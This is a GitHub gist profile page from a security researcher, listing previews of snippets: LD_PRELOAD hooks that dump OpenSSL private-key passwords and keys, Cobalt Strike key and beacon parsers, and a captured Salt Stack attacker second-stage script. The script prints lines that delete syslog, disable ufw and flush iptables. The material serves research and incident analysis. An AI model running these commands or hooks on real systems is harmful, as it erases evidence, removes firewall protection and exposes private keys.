Skip to content

Instantly share code, notes, and snippets.

View olliencc's full-sized avatar

Ollie olliencc

240 followers · 3 following
View GitHub Profile
@olliencc
olliencc / dumpprivatekeypassword.c
Created June 2, 2015 18:15
dump the password used by an openssl client for its private key using LD_PRELOAD and hooking the callback registration functions
//
// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
// Licensed under the terms of GPLv3 (or any later version) at your choice
//
// works for daemons which can be run in the foreground
//
// gcc nccsslpasswdlog.c -shared -o nccsslpasswdlog.so -fPIC -ldl
//
//
@olliencc
olliencc / nccsslkeyandcertlog.c
Last active August 29, 2015 14:22
dump the certificate and private in PEM format when used
//
// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
// Licensed under the terms of GPLv3 (or any later version) at your choice
//
// works for daemons which can be run in the foreground
//
// gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl
//
//
@olliencc
olliencc / whodoineedtotrust.go
Created January 2, 2016 21:16
Understand which CAs you need to trust for the Alexa top million
/*
Understand which CAs you need to trust for the Alexa top million
Released as open source by NCC Group Plc - http://www.nccgroup.trust/
Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust
Released under AGPL
@olliencc
olliencc / PEDumpHelpScanner.py
Created April 12, 2019 20:21
How to scan for Windows binaries with the MINIDUMP_AUXILIARY_PROVIDER resource section
#
# Ollie Whitehouse
# ollie.whitehouse [@] nccgroup.com
#
import os
import pefile
rootdirs = [
#"C:/Data/NCC/!Research/DUMPHELPER/test/t/"
@olliencc
olliencc / sendtoTeams.cs
Created May 1, 2020 19:51
using System;
using System.Net.Http;
using System.Runtime.CompilerServices;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json;
using MessageCardModel;
using System.Collections.Generic;
using System.IO;
using MessageCardModel.Actions;
@olliencc
olliencc / Salt Stack Second Stage from 217.12.210.192
Created May 3, 2020 09:56
/bin/sh
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
@olliencc
olliencc / Dump.java
Created June 15, 2020 10:22
Dump keys from Cobalt Strike server
import java.io.File;
import java.util.Base64;
import common.CommonUtils;
import java.security.KeyPair;
class DumpKeys
{
public static void main(String[] args)
{
try {
@olliencc
olliencc / beacon-metadata.py
Created June 15, 2020 10:24
Parse CobaltStrike beacon metadata
import M2Crypto
import requests
PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----"
PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"
class Metadata(object):
"""
Class to represent a beacon Metadata object
"""
@olliencc
olliencc / beacon-aes.py
Created June 15, 2020 10:25
CobaltStrike Beacon AES encryption
import hashlib
import hmac
import binascii
import base64
import sys
import struct
from Crypto.Cipher import AES
HASH_ALGO = hashlib.sha256
SIG_SIZE = HASH_ALGO().digest_size
@olliencc
olliencc / aes-parser.py
Created June 15, 2020 10:26
Parse AES tasks from CobaltStrike Beacon
# NOTE: insert decryption functions
if __name__ == "__main__":
SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184")
HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9")
with open(sys.argv[1], 'rb') as f:
enc_data = f.read()
encrypted_data, data_length = readInt(enc_data)
print "Encrypted data should be: %d" % data_length
signature = encrypted_data[-16:]